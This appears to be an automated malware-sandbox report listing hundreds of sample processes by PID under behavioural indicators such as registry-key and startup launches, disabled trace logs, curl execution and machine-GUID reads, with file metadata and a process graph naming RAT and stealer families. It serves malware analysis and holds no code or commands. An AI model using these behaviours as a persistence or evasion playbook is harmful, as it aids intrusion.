      • net_launcher.exe (PID: 9588)
      • TempSpoofer.exe (PID: 9816)
      • Client.exe (PID: 9996)
      • Qbix01.exe (PID: 9796)
      • Prolin.exe (PID: 9988)
      • 11.exe (PID: 9892)
      • winvnc.exe (PID: 10176)
      • window.exe (PID: 10452)
      • Client.exe (PID: 10588)
      • Windows 任务的主机进程.exe (PID: 10536)
      • Amus.exe (PID: 10740)
      • LOIC.exe (PID: 10280)
      • build.exe (PID: 11296)
      • pieletJF.exe (PID: 11348)
      • Axam.a.exe (PID: 10664)
      • Windows 任务的主机进程.exe (PID: 11544)
      • Axam.exe (PID: 11996)
      • pieletJF_vm.exe (PID: 12380)
      • AutoIt3.exe (PID: 12584)
      • file_c0d2eb6a8b73120b.exe (PID: 11164)
      • Axam.exe (PID: 12832)
      • implant_http.exe (PID: 8932)
      • msedge.exe (PID: 13212)
      • pardufrigi_installer_1.0.p1.exe (PID: 9812)
      • Pinaview.exe (PID: 13164)
      • cummersMG.exe (PID: 12864)
      • AddMeFast%20Bot.exe (PID: 9952)
      • whatever.exe (PID: 13352)
      • CryptoLocker.exe (PID: 12932)
      • kliulij.exe (PID: 13360)
      • BootstrapperNew.exe (PID: 12572)
      • curl.exe (PID: 7556)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 13680)
      • rmd_en_1.exe (PID: 13320)
      • rod_en_1.exe (PID: 13608)
      • CXmFD.exe (PID: 13556)
      • VKkQj.exe (PID: 13380)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 14036)
      • nircmd.exe (PID: 13748)
      • rxd_en_1.exe (PID: 13944)
      • GMSSetupX86.exe (PID: 13616)
      • G7_Update.exe (PID: 13388)
      • Pinaview.tmp (PID: 14120)
      • REXCEL~1.EXE (PID: 13316)
      • ww7.exe (PID: 13772)
      • is-A140U.tmp (PID: 14020)
      • fastping_silent_v4.exe (PID: 11216)
      • is-BE52S.tmp (PID: 8848)
      • NAMUVPN7.exe (PID: 13740)
      • Konsol.exe (PID: 14460)
      • Pulsar-Client.exe (PID: 14072)
      • brbotnet.exe (PID: 11036)
      • pardufrigi_installer_1.0.p1.tmp (PID: 14136)
      • beacon.exe (PID: 14580)
      • brbotnet.exe (PID: 14516)
      • fo4translator.exe (PID: 12712)
      • downloader.exe (PID: 15204)
      • VC_redist.x64.exe (PID: 2760)
      • uRgOy.exe (PID: 8272)
      • Fast%20Download.exe (PID: 15652)
      • Fast%20Download.exe (PID: 15660)
      • XClient.exe (PID: 11448)
      • lol.exe (PID: 10436)
      • sunwukongs.exe (PID: 16044)
      • Steanings.exe (PID: 16408)
      • Install.exe (PID: 10496)
      • FXServer.exe (PID: 11076)
      • Isass.exe (PID: 15280)
      • RuntimeBroker.exe (PID: 14368)
      • Steanings.exe (PID: 16520)
      • PowerRat.exe (PID: 16772)
      • assignment.exe (PID: 16256)
      • Cloudy.exe (PID: 14412)
      • JLFfdd.exe (PID: 14672)
      • curl.exe (PID: 17200)
      • x64-setup.exe (PID: 15452)
      • hnmh.exe (PID: 8484)
      • jhgkuyyg.exe (PID: 14548)
      • steamcmd.exe (PID: 16632)
      • Rsvp_invite%23903388.exe (PID: 13596)
      • cssgo.exe (PID: 17492)
      • self-injection.exe (PID: 16968)
      • Round_Setup.exe (PID: 13624)
      • Axam.exe (PID: 16644)
      • 444.exe (PID: 16332)
      • bjbh.exe (PID: 14660)
      • Lab01-02.exe (PID: 17928)
      • Axam.exe (PID: 17192)
      • Loader.exe (PID: 17824)
      • Axam.exe (PID: 7304)
      • BruterV3.1.exe (PID: 15944)
      • CagService.exe (PID: 17860)
      • dxwsetup.exe (PID: 17708)
      • Axam.exe (PID: 10848)
      • Axam.exe (PID: 17976)
      • ljgksdtihd.exe (PID: 3412)
      • keygen.exe (PID: 11804)
      • taskmoder.exe (PID: 18692)
      • cleanup_tool.exe (PID: 10440)
      • justpoc.exe (PID: 18376)
      • prueba.exe (PID: 16824)
      • jqqvLru0VAiH3z.exe (PID: 16144)
      • IniEditor.exe (PID: 18636)
      • Axam.exe (PID: 8408)
      • alphaTweaks.exe (PID: 16760)
      • NJRat.exe (PID: 17172)
      • file_7d9b4f2278093dda.exe (PID: 19036)
      • payload.exe (PID: 17452)
      • donut.exe (PID: 18732)
      • file.exe (PID: 8752)
      • 1223.exe (PID: 18104)
      • Axam.exe (PID: 19212)
      • Client-built.exe (PID: 18144)
      • VC_redist.x64.exe (PID: 20216)
      • Axam.exe (PID: 19392)
      • Client-built.exe (PID: 18136)
      • curl.exe (PID: 20372)
      • bnkrigkawd.exe (PID: 18392)
      • Isass.exe (PID: 7912)
      • srtware.exe (PID: 17764)
      • Client-built.exe (PID: 10620)
      • svchost.exe (PID: 17900)
      • Axam.exe (PID: 19440)
      • pfntjejghjsdkr.exe (PID: 19804)
      • svchost.exe (PID: 18176)
      • namuvpnx2.exe (PID: 18008)
      • putty.exe (PID: 17028)
      • Axam.exe (PID: 18880)
      • Axam.exe (PID: 16172)
      • Yellow%20Pages%20Scraper.exe (PID: 20816)
      • Axam.exe (PID: 19660)
      • requirements.exe (PID: 5308)
      • svchost.exe (PID: 17872)
      • svchost.exe (PID: 17880)
      • svchost.exe (PID: 10072)
      • svchost.exe (PID: 10016)
      • 3e3ev3.exe (PID: 18288)
      • Meredrop.exe (PID: 21124)
      • crypted.exe (PID: 21212)
      • services.exe (PID: 20800)
      • Phantom.exe (PID: 20232)
      • svchost.exe (PID: 18676)
      • svchost.exe (PID: 18908)
      • svchost.exe (PID: 17956)
      • mely.exe (PID: 20936)
      • ExtremeInjector.exe (PID: 19360)
      • ScreenConnect.ClientSetup.exe (PID: 21304)
      • lol1.exe (PID: 20036)
      • Update.exe (PID: 21280)
      • VOKLIGHT.exe (PID: 20740)
      • MEMZ.exe (PID: 20832)
      • CoronaVirus.exe (PID: 20708)
      • calendar.exe (PID: 20808)
      • NoEscape.exe (PID: 20912)
      • Axam.exe (PID: 20448)
      • Axam.exe (PID: 20544)
      • 640.exe (PID: 21608)
      • 4J8576A0E8V3.exe (PID: 7332)
      • ui.exe (PID: 18116)
      • 4J8576A0E8V3.exe (PID: 21496)
      • Gui.exe (PID: 15540)
      • chrome_134.exe (PID: 21240)
      • WindowsUpdate.exe (PID: 17616)
      • curl.exe (PID: 24792)
      • VOKLIGHTD.exe (PID: 19568)
      • steamcmd.exe (PID: 11420)
      • 5252.exe (PID: 22652)
      • 1488.exe (PID: 14064)
      • curl.exe (PID: 26000)
      • zke-nfoview.exe (PID: 21180)
      • Axam.exe (PID: 19680)
      • zke-ascv.exe (PID: 21056)
      • msiexec.exe (PID: 14872)
      • safman_setup.tmp (PID: 24288)
      • Updater.exe (PID: 18208)
      • paramssps.exe (PID: 21108)
      • steamerrorreporter.exe (PID: 19448)
      • Axam.exe (PID: 20344)
      • dw20.exe (PID: 16804)
      • fo-wsftp605.exe (PID: 20896)
      • snd16061.exe (PID: 20952)
      • dw20.exe (PID: 13344)
      • inst77player_1.0.0.1.exe (PID: 20904)
    • Create files in a temporary directory

      • 2to1ep.exe (PID: 3352)
      • dfsvc.exe (PID: 9084)
      • Silentum_Spoofer.exe (PID: 8640)
      • CFXBypass.exe (PID: 6640)
      • Qbix01.exe (PID: 9796)
      • TempSpoofer.exe (PID: 9816)
      • Prolin.exe (PID: 9988)
      • Axam.a.exe (PID: 10664)
      • Amus.exe (PID: 10740)
      • fastping_silent_v4.exe (PID: 11216)
      • Axam.exe (PID: 11996)
      • Client.exe (PID: 10588)
      • Axam.exe (PID: 12832)
      • pardufrigi_installer_1.0.p1.exe (PID: 9812)
      • Pinaview.exe (PID: 13164)
      • rmd_en_1.exe (PID: 13320)
      • rod_en_1.exe (PID: 13608)
      • rxd_en_1.exe (PID: 13944)
      • Rsvp_invite%23903388.exe (PID: 13596)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 9916)
      • pardufrigi_installer_1.0.p1.tmp (PID: 14136)
      • Pinaview.tmp (PID: 14120)
      • RMO_SE~2.EXE (PID: 9944)
      • setup.exe (PID: 14300)
      • is-A140U.tmp (PID: 14020)
      • is-BE52S.tmp (PID: 8848)
      • csc.exe (PID: 14192)
      • brbotnet.exe (PID: 11036)
      • brbotnet.exe (PID: 14516)
      • downloader.exe (PID: 15204)
      • cvtres.exe (PID: 14844)
      • FXServer.exe (PID: 11076)
      • Isass.exe (PID: 15280)
      • dxwebsetup.exe (PID: 9272)
      • Axam.exe (PID: 16644)
      • StatingConnectors.exe (PID: 16356)
      • csc.exe (PID: 15812)
      • csc.exe (PID: 16128)
      • csc.exe (PID: 16268)
      • Serials_Checker.exe (PID: 16156)
      • Axam.exe (PID: 17192)
      • Axam.exe (PID: 7304)
      • csc.exe (PID: 16192)
      • cvtres.exe (PID: 17656)
      • cvtres.exe (PID: 17848)
      • cvtres.exe (PID: 17992)
      • lol.exe (PID: 10436)
      • cvtres.exe (PID: 16072)
      • Axam.exe (PID: 10848)
      • Axam.exe (PID: 17976)
      • Axam.exe (PID: 8408)
      • IniEditor.exe (PID: 18636)
      • file_7d9b4f2278093dda.exe (PID: 19036)
      • donut.exe (PID: 18732)
      • 1223.exe (PID: 18104)
      • 1210.exe (PID: 18300)
      • RustMeDebyg.exe (PID: 19912)
      • hell9o.exe (PID: 18748)
      • Axam.exe (PID: 18880)
      • ScreenConnect.ClientSetup.exe (PID: 21304)
      • Update.exe (PID: 21280)
      • alphaTweaks.exe (PID: 16760)
      • ScreenConnect.ClientSetup.exe (PID: 21312)
      • rsh-192-168-1-89.exe (PID: 20944)
      • bnoaprihjatuasss.exe (PID: 21400)
      • SharpHound.exe (PID: 21272)
      • ClassTicket.exe (PID: 21368)
      • CryptoWall.exe (PID: 21288)
      • PrivacyPolicy.exe (PID: 11852)
      • ProcessHide32.exe (PID: 21264)
      • Destover.exe (PID: 21336)
      • FreeYoutubeDownloader.exe (PID: 21352)
      • PXray_Cast_Sort.exe (PID: 19796)
      • DRIVEapplet.exe (PID: 21328)
      • hack1226.exe (PID: 21488)
      • namu864.exe (PID: 21360)
      • nc64.exe (PID: 21320)
      • safman_setup.exe (PID: 21224)
      • 3e3ev3.exe (PID: 18288)
      • lol11.exe (PID: 21384)
      • Security.exe (PID: 12864)
      • mueiel09765.exe (PID: 20372)
      • file_a6357da6a05d7266.exe (PID: 21376)
      • Tinder%20Bot.exe (PID: 21480)
      • standalone_payload.exe (PID: 21392)
      • backdoor.exe (PID: 21296)
      • Jigsaw.exe (PID: 21344)
      • jeditor.exe (PID: 21476)
      • fo-wsftp605.exe (PID: 20896)
      • BCDC.tmp (PID: 22376)
      • executavel_temporario.exe (PID: 22516)
      • Gui.exe (PID: 15540)
      • Axam.exe (PID: 20344)
      • ui.exe (PID: 18116)
      • RDPW_Installer.exe (PID: 20856)
      • 123123.exe (PID: 22012)
      • Axam.exe (PID: 19680)
      • msiexec.exe (PID: 21004)
      • inst77player_1.0.0.1.exe (PID: 20904)
      • sanghyun.exe (PID: 20792)
      • Axam.exe (PID: 22384)
      • VC_redist.x64.exe (PID: 20216)
      • cvtres.exe (PID: 16020)
      • csc.exe (PID: 19516)
      • Axam.exe (PID: 24848)
      • Axam.exe (PID: 24052)
      • 52.exe (PID: 10552)
    • Reads security settings of Internet Explorer

      • Taskmgr.exe (PID: 4592)
      • dfsvc.exe (PID: 9084)
      • CFXBypass.exe (PID: 6640)
      • Silentum_Spoofer.exe (PID: 8640)
      • file_b584670f7ec2f317.exe (PID: 6556)
      • win.exe (PID: 6068)
      • TempSpoofer.exe (PID: 9816)
      • Client.exe (PID: 9996)
      • 11.exe (PID: 9892)
      • window.exe (PID: 10452)
      • Amus.exe (PID: 10740)
      • LOIC.exe (PID: 10280)
      • AutoIt3.exe (PID: 12584)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 13680)
      • fastping_silent_v4.exe (PID: 11216)
      • G7_Update.exe (PID: 13388)
      • beacon.exe (PID: 14580)
      • BootstrapperNew.exe (PID: 12572)
      • downloader.exe (PID: 15204)
      • fo4translator.exe (PID: 12712)
      • msedge.exe (PID: 13212)
      • FXServer.exe (PID: 11076)
      • WMIC.exe (PID: 16492)
      • assignment.exe (PID: 16256)
      • WMIC.exe (PID: 7580)
      • WMIC.exe (PID: 17736)
      • 444.exe (PID: 16332)
      • Loader.exe (PID: 17824)
      • lol.exe (PID: 10436)
      • justpoc.exe (PID: 18376)
      • IniEditor.exe (PID: 18636)
      • file_7d9b4f2278093dda.exe (PID: 19036)
      • donut.exe (PID: 18732)
      • file.exe (PID: 8752)
      • 1223.exe (PID: 18104)
      • pfntjejghjsdkr.exe (PID: 19804)
      • alphaTweaks.exe (PID: 16760)
      • ExtremeInjector.exe (PID: 19360)
      • Phantom.exe (PID: 20232)
      • ScreenConnect.ClientSetup.exe (PID: 21304)
      • Update.exe (PID: 21280)
      • VOKLIGHT.exe (PID: 20740)
      • lol1.exe (PID: 20036)
      • conhost.exe (PID: 19172)
      • taskmoder.exe (PID: 18692)
      • Gui.exe (PID: 15540)
      • VOKLIGHTD.exe (PID: 19568)
      • VC_redist.x64.exe (PID: 20216)
      • chrome_134.exe (PID: 21240)
      • 5252.exe (PID: 22652)
      • 1488.exe (PID: 14064)
      • RuntimeBroker.exe (PID: 14368)
      • conhost.exe (PID: 20840)
      • steamerrorreporter.exe (PID: 19448)
      • explorer.exe (PID: 25412)
      • explorer.exe (PID: 18460)
      • paramssps.exe (PID: 21108)
    • Reads the machine GUID from the registry

      • support.client.exe (PID: 4284)
      • dfsvc.exe (PID: 9084)
      • EagleWingsDNA04.exe (PID: 2156)
      • CFXBypass.exe (PID: 6640)
      • Silentum_Spoofer.exe (PID: 8640)
      • net_launcher.exe (PID: 9588)
      • finale.exe (PID: 9708)
      • TempSpoofer.exe (PID: 9816)
      • Auo1.exe (PID: 7928)
      • Amus.exe (PID: 10740)
      • LOIC.exe (PID: 10280)
      • build.exe (PID: 11296)
      • Client.exe (PID: 10588)
      • msedge.exe (PID: 13212)
      • BootstrapperNew.exe (PID: 12572)
      • AddMeFast%20Bot.exe (PID: 9952)
      • whatever.exe (PID: 13352)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 13680)
      • VKkQj.exe (PID: 13380)
      • Pinaview.tmp (PID: 14120)
      • fastping_silent_v4.exe (PID: 11216)
      • brbotnet.exe (PID: 11036)
      • csc.exe (PID: 14192)
      • beacon.exe (PID: 14580)
      • brbotnet.exe (PID: 14516)
      • VC_redist.x64.exe (PID: 2760)
      • uRgOy.exe (PID: 8272)
      • sunwukongs.exe (PID: 16044)
      • Install.exe (PID: 10496)
      • Steanings.exe (PID: 16408)
      • Steanings.exe (PID: 16520)
      • Pulsar-Client.exe (PID: 14072)
      • jqqvLru0VAiH3z.exe (PID: 16144)
      • steamcmd.exe (PID: 16632)
      • csc.exe (PID: 15812)
      • XClient.exe (PID: 11448)
      • csc.exe (PID: 16128)
      • cssgo.exe (PID: 17492)
      • csc.exe (PID: 16268)
      • RuntimeBroker.exe (PID: 14368)
      • csc.exe (PID: 16192)
      • Cloudy.exe (PID: 14412)
      • Loader.exe (PID: 17824)
      • CagService.exe (PID: 17860)
      • ljgksdtihd.exe (PID: 3412)
      • taskmoder.exe (PID: 18692)
      • justpoc.exe (PID: 18376)
      • Isass.exe (PID: 7912)
      • BruterV3.1.exe (PID: 15944)
      • alphaTweaks.exe (PID: 16760)
      • payload.exe (PID: 17452)
      • Client-built.exe (PID: 10620)
      • Client-built.exe (PID: 18144)
      • Client-built.exe (PID: 18136)
      • VC_redist.x64.exe (PID: 20216)
      • Yellow%20Pages%20Scraper.exe (PID: 20816)
      • 3e3ev3.exe (PID: 18288)
      • bnkrigkawd.exe (PID: 18392)
      • mely.exe (PID: 20936)
      • VOKLIGHT.exe (PID: 20740)
      • VOKLIGHTD.exe (PID: 19568)
      • requirements.exe (PID: 5308)
      • conhost.exe (PID: 20840)
      • services.exe (PID: 20800)
      • paramssps.exe (PID: 21108)
      • dw20.exe (PID: 16804)
      • csc.exe (PID: 19516)
      • dw20.exe (PID: 13344)
    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 9084)
      • Taskmgr.exe (PID: 4592)
      • Client.exe (PID: 9996)
      • Amus.exe (PID: 10740)
      • Axam.a.exe (PID: 10664)
      • CryptoLocker.exe (PID: 12932)
      • fastping_silent_v4.exe (PID: 11216)
      • Fast%20Download.exe (PID: 15660)
      • assignment.exe (PID: 16256)
      • 444.exe (PID: 16332)
      • Loader.exe (PID: 17824)
      • ljgksdtihd.exe (PID: 3412)
      • justpoc.exe (PID: 18376)
      • Silentum_Spoofer.exe (PID: 8640)
      • VOKLIGHT.exe (PID: 20740)
      • Cloudy.exe (PID: 14412)
      • VC_redist.x64.exe (PID: 20216)
    • Connecting to InterPlanetary File System domains

      • svchost.exe (PID: 2232)
    • Reads Environment values

      • dfsvc.exe (PID: 9084)
      • finale.exe (PID: 9708)
      • Silentum_Spoofer.exe (PID: 8640)
      • CFXBypass.exe (PID: 6640)
      • net_launcher.exe (PID: 9588)
      • TempSpoofer.exe (PID: 9816)
      • Windows 任务的主机进程.exe (PID: 10536)
      • Pulsar-Client.exe (PID: 14072)
      • BruterV3.1.exe (PID: 15944)
      • Client-built.exe (PID: 18136)
      • payload.exe (PID: 17452)
      • Client-built.exe (PID: 10620)
      • jqqvLru0VAiH3z.exe (PID: 16144)
      • Client-built.exe (PID: 18144)
      • XClient.exe (PID: 11448)
      • 3e3ev3.exe (PID: 18288)
      • RuntimeBroker.exe (PID: 14368)
      • bnkrigkawd.exe (PID: 18392)
      • alphaTweaks.exe (PID: 16760)
      • Cloudy.exe (PID: 14412)
      • x64-setup.exe (PID: 15452)
      • dw20.exe (PID: 16804)
      • requirements.exe (PID: 5308)
    • Disables trace logs

      • dfsvc.exe (PID: 9084)
      • EagleWingsDNA04.exe (PID: 2156)
      • net_launcher.exe (PID: 9588)
      • Auo1.exe (PID: 7928)
      • CFXBypass.exe (PID: 6640)
      • Silentum_Spoofer.exe (PID: 8640)
      • TempSpoofer.exe (PID: 9816)
      • whatever.exe (PID: 13352)
      • cssgo.exe (PID: 17492)
      • taskmoder.exe (PID: 18692)
      • Client-built.exe (PID: 18136)
      • payload.exe (PID: 17452)
      • XClient.exe (PID: 11448)
      • jqqvLru0VAiH3z.exe (PID: 16144)
      • 3e3ev3.exe (PID: 18288)
      • Cloudy.exe (PID: 14412)
      • alphaTweaks.exe (PID: 16760)
      • bnkrigkawd.exe (PID: 18392)
      • requirements.exe (PID: 5308)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 6872)
      • mshta.exe (PID: 3156)
      • mshta.exe (PID: 8060)
      • mshta.exe (PID: 8984)
      • mshta.exe (PID: 9944)
      • mshta.exe (PID: 15888)
      • mshta.exe (PID: 20988)
      • mshta.exe (PID: 20976)
    • The sample compiled with chinese language support

      • 2to1ep.exe (PID: 8924)
      • win.exe (PID: 6068)
    • Process checks computer location settings

      • win.exe (PID: 6068)
      • 11.exe (PID: 9892)
      • Client.exe (PID: 9996)
      • G7_Update.exe (PID: 13388)
      • FXServer.exe (PID: 11076)
      • downloader.exe (PID: 15204)
      • assignment.exe (PID: 16256)
      • msedge.exe (PID: 13212)
      • 444.exe (PID: 16332)
      • lol.exe (PID: 10436)
      • fo4translator.exe (PID: 12712)
      • IniEditor.exe (PID: 18636)
      • file_7d9b4f2278093dda.exe (PID: 19036)
      • donut.exe (PID: 18732)
      • file.exe (PID: 8752)
      • 1223.exe (PID: 18104)
      • pfntjejghjsdkr.exe (PID: 19804)
      • Phantom.exe (PID: 20232)
      • ExtremeInjector.exe (PID: 19360)
      • ScreenConnect.ClientSetup.exe (PID: 21304)
      • Update.exe (PID: 21280)
      • lol1.exe (PID: 20036)
      • Gui.exe (PID: 15540)
      • taskmoder.exe (PID: 18692)
      • VC_redist.x64.exe (PID: 20216)
      • XClient.exe (PID: 11448)
      • 5252.exe (PID: 22652)
      • 1488.exe (PID: 14064)
      • conhost.exe (PID: 20840)
      • RuntimeBroker.exe (PID: 14368)
      • dw20.exe (PID: 16804)
    • Launching a file from a Registry key

      • Windows 任务的主机进程.exe (PID: 10536)
      • Axam.a.exe (PID: 10664)
      • Windows 任务的主机进程.exe (PID: 11544)
      • Amus.exe (PID: 10740)
      • Axam.exe (PID: 11996)
      • Axam.exe (PID: 12832)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 13680)
      • rmd_en_1.exe (PID: 13320)
      • rod_en_1.exe (PID: 13608)
      • rxd_en_1.exe (PID: 13944)
      • assignment.exe (PID: 16256)
      • Rsvp_invite%23903388.exe (PID: 13596)
      • dxwebsetup.exe (PID: 9272)
      • Axam.exe (PID: 16644)
      • Axam.exe (PID: 17192)
      • Axam.exe (PID: 7304)
      • StatingConnectors.exe (PID: 16356)
      • Serials_Checker.exe (PID: 16156)
      • Axam.exe (PID: 10848)
      • Axam.exe (PID: 17976)
      • Axam.exe (PID: 8408)
      • Axam.exe (PID: 19212)
      • Axam.exe (PID: 19392)
      • hell9o.exe (PID: 18748)
      • Axam.exe (PID: 19440)
      • Axam.exe (PID: 16172)
      • Axam.exe (PID: 18880)
      • Axam.exe (PID: 19660)
      • Axam.exe (PID: 20448)
      • Axam.exe (PID: 20544)
      • Axam.exe (PID: 19680)
      • Axam.exe (PID: 20344)
    • Launching a file from the Startup directory

      • Axam.a.exe (PID: 10664)
      • Fast%20Download.exe (PID: 15652)
      • Cloudy.exe (PID: 14412)
    • Reads mouse settings

      • AutoIt3.exe (PID: 12584)
      • GMSSetupX86.exe (PID: 13616)
      • AutoIt3.exe (PID: 17540)
    • PyInstaller has been detected (YARA)

      • 2to1ep.exe (PID: 3352)
    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 9084)
      • Isass.exe (PID: 15280)
      • Isass.exe (PID: 7912)
    • Execution of CURL command

      • cmd.exe (PID: 13100)
      • cmd.exe (PID: 16984)
      • cmd.exe (PID: 19796)
      • cmd.exe (PID: 6248)
      • cmd.exe (PID: 4972)
      • cmd.exe (PID: 1152)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 9408)
      • powershell.exe (PID: 9788)
      • powershell.exe (PID: 9464)
      • powershell.exe (PID: 9200)
      • powershell.exe (PID: 11204)
      • powershell.exe (PID: 12284)
      • powershell.exe (PID: 10120)
      • powershell.exe (PID: 18700)
      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 16336)
      • powershell.exe (PID: 17256)
      • powershell.exe (PID: 17908)
      • powershell.exe (PID: 20132)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 10120)
      • powershell.exe (PID: 9464)
      • powershell.exe (PID: 11204)
      • powershell.exe (PID: 11252)
      • powershell.exe (PID: 9408)
      • powershell.exe (PID: 9200)
      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 20824)
    • NirSoft software is detected

      • nircmd.exe (PID: 13748)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 10444)
      • powershell.exe (PID: 17548)
      • powershell.exe (PID: 19312)
      • powershell.exe (PID: 19304)
      • powershell.exe (PID: 16320)
    • The sample compiled with korean language support

      • fastping_silent_v4.exe (PID: 11216)
      • G7_Update.exe (PID: 13388)
      • 2to1ep.exe (PID: 8924)
      • IniEditor.exe (PID: 18636)
      • PXray_Cast_Sort.exe (PID: 19796)
      • namu864.exe (PID: 21360)
      • jeditor.exe (PID: 21476)
    • Application launched itself

      • cmd.exe (PID: 12072)
      • cmd.exe (PID: 11288)
      • cmd.exe (PID: 20636)
      • cmd.exe (PID: 20652)
      • cmd.exe (PID: 20960)
    • The sample compiled with polish language support

      • 2to1ep.exe (PID: 8924)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 9788)
      • powershell.exe (PID: 9464)
      • powershell.exe (PID: 12100)
      • powershell.exe (PID: 5800)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 9788)
      • powershell.exe (PID: 20824)
    • Attempting to connect via WebSocket

      • EmmetPROD.exe (PID: 15520)
    • Creates a software uninstall entry

      • Rsvp_invite%23903388.exe (PID: 13596)
      • fastping_silent_v4.exe (PID: 11216)
    • DATTO has been detected

      • Rsvp_invite%23903388.exe (PID: 13596)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 10444)
      • powershell.exe (PID: 12284)
      • Silentum_Spoofer.exe (PID: 8640)
      • CFXBypass.exe (PID: 6640)
      • powershell.exe (PID: 9408)
      • powershell.exe (PID: 10120)
      • powershell.exe (PID: 9200)
      • powershell.exe (PID: 8060)
      • powershell.exe (PID: 11204)
      • powershell.exe (PID: 17908)
    • The sample compiled with russian language support

      • 2to1ep.exe (PID: 8924)
    • The sample compiled with Italian language support

      • 2to1ep.exe (PID: 8924)
    • Reads product name

      • jqqvLru0VAiH3z.exe (PID: 16144)
      • dw20.exe (PID: 16804)
    • Attempting to use instant messaging service

      • svchost.exe (PID: 2232)
      • Client-built.exe (PID: 18136)
      • Client-built.exe (PID: 10620)
    • Creating file in SysWOW64

      • 640.exe (PID: 21608)
    • Using PowerShell for ZIP File Operations

      • powershell.exe (PID: 11204)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 11204)
    • Changes the display of characters in the console

      • cmd.exe (PID: 25972)
      • cmd.exe (PID: 6244)
    • Checks operating system version

      • Isass.exe (PID: 7912)
    • Reads CPU info

      • dw20.exe (PID: 16804)
    • Failed to connect to remote server (POWERSHELL)

      • powershell.exe (PID: 17256)
      • powershell.exe (PID: 20132)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.api | Adobe Acrobat Reader Plugin (5.5)
.dll | foobar 2000 generic component (5.5)
.dll | foobar 2000 Diskwriter output component (5.5)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:06:21 16:50:42+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 178688
InitializedDataSize: 154624
UninitializedDataSize: -
EntryPoint: 0xc380
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
836
Monitored processes
664
Malicious processes
120
Suspicious processes
94

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs openwith.exe no specs 2to1ep.exe no specs 2to1ep.exe conhost.exe no specs #ASYNCRAT 2to1ep.exe cmd.exe schtasks.exe no specs cmd.exe no specs taskmgr.exe no specs support.client.exe #SCREENCONNECT dfsvc.exe eaglewingsdna04.exe mshta.exe no specs mshta.exe no specs vnc.exe no specs conhost.exe no specs cfxbypass.exe silentum_spoofer.exe mshta.exe no specs shell.exe win.exe mshta.exe no specs #STEALC file_b584670f7ec2f317.exe auo1.exe powershell.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs #GENERIC powershell.exe net_launcher.exe wscript.exe no specs conhost.exe no specs finale.exe no specs powershell.exe qbix01.exe cmd.exe no specs tempspoofer.exe conhost.exe no specs conhost.exe no specs 11.exe no specs prolin.exe #XENORAT client.exe powershell.exe no specs conhost.exe no specs winvnc.exe no specs powershell.exe outlook.exe conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs 1.exe powershell.exe no specs window.exe conhost.exe no specs #VALLEYRAT windows 任务的主机进程.exe cmd.exe no specs #XENORAT client.exe no specs #GENERIC axam.a.exe conhost.exe no specs #GENERIC amus.exe powershell.exe no specs powershell.exe no specs rickroll.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs net.exe no specs file_c0d2eb6a8b73120b.exe powershell.exe fastping_silent_v4.exe conhost.exe no specs powershell.exe no specs loic.exe no specs net1.exe no specs conhost.exe no specs cmd.exe no specs build.exe taskkill.exe no specs ping.exe no specs conhost.exe no specs pieletjf.exe no specs conhost.exe no specs wscript.exe no specs windows 任务的主机进程.exe cmd.exe no specs conhost.exe no specs axam.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs mshta.exe no specs schtasks.exe no specs conhost.exe no specs ping.exe no specs pieletjf_vm.exe no specs better.exe no specs conhost.exe no specs autoit3.exe no specs fo4translator.exe taskkill.exe no specs axam.exe conhost.exe no specs cmd.exe no specs implant_http.exe keepon.exe no specs conhost.exe no specs dajoke2.exe no specs taskkill.exe no specs conhost.exe no specs conhost.exe no specs curl.exe werfault.exe msedge.exe no specs test.exe pinaview.exe cryptolocker.exe bootstrappernew.exe no specs cummersmg.exe no specs pardufrigi_installer_1.0.p1.exe addmefast%20bot.exe no specs %e5%88%92%e5%ad%a6%e5%8f%b7v2--%e6%9e%81%e9%80%9f%e7%89%88.exe rmd_en_1.exe whatever.exe kliulij.exe vkkqj.exe g7_update.exe conhost.exe no specs cxmfd.exe THREAT powershell.exe no specs rsvp_invite%23903388.exe rod_en_1.exe gmssetupx86.exe no specs 